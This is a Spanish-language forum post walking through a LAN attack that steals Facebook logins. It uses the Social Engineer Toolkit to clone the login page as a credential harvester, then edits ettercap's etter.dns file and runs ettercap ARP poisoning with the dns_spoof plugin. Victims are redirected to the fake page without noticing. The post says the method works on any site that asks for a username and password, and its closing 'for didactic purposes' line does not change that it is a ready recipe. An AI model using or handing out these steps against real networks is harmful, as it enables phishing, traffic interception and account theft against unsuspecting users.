Suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de nombre, es decir, resolver con una dirección IP falsa un cierto nombre NS o viceversa. Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el cache DNS de otro servidor diferente (DNS Poisoning).
El siguiente ataque se realizo bajo una LAN, el atacante usando BackTrack 5 R3 y la victima Windows 7, Cabe destacar que el sistema operativo de la victima es irrelevante
La idea de este ataque es capturar el usuario y la contraseña de una cuenta de Facebook, esto funciona con cualquier pagina que pida usuario y contraseña
Herramientas a usar:
Social Engineer Tool-kit
Ettercap
Empecemos...
1.) ingresamos a la siguiente ruta:
#cd /pentest/exploits/set
#./set
Se abrirá la aplicación SET para ataques de ingeniería social
Seleccionamos 1 para ataques de ingeniería social
Seleccionamos 2 para vectores de ataques a sitios web
[imghttp://1.bp.blogspot.com/--pTpSfgFRJY/UQKo30BMTBI/AAAAAAAAAus/o8sfjf_PYzk/s640/dns03.jpg]http://[/img]
Seleccionamos 3 para recolector de credenciales y clonar la pagina
[imghttp://4.bp.blogspot.com/-r3hiPfAGSU8/UQKo4ccje4I/AAAAAAAAAu4/krnBkJoWefI/s640/dns04.jpg][/img]
Seleccionamos 2 para clonar el sitio
Ahora colocamos nuestra ip
Ahora nos pedirá la pagina a la que queremos clonar, en nuestro caso facebook
Una vez finalizado empezara a iniciar el clonado a la pagina web, es necesario tener el servicio de apache iniciado, en caso de que no lo este, nos aparecerá el siguiente mensaje
Bueno hasta acá tenemos la configuración con éxitos para poder realizar el envenenamiento por dns ,la victima tendría que poner nuestra dirección IP en su navegador,y a continuación aparecería el mensaje de login de Facebook.
Para que el usuario no ingrese nuestra dirección IP, ocuparemos una herramienta llamada ettetcap, su función sera que cuando el usuario ingrese a facebook se envenene automáticamente y no tenga que ingresar nuestra IP. Para ello con un editor de texto editamos la siguiente ruta
/usr/local/share/ettercap/etter.dns
y agregamos los siguientes parámetros
Dominio.com A IP
*.Dominio A IP
www.dominio.com PTR IP
Le damos a guardar y cerramos el editor, ahora envenenamos usando ettercap, escribimos:
ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //
Y ahora cuando la victima ingrese a facebook y ponga su usuario y contraseña
Recibimos la información de la cookies GET que captura en la lan.
Bueno espero que les haya gustado, y no olviden que.
EL SIGUIENTE POST ES CON FINES DIDACTICOS 
MoonShadow
Mostrar Mensajes
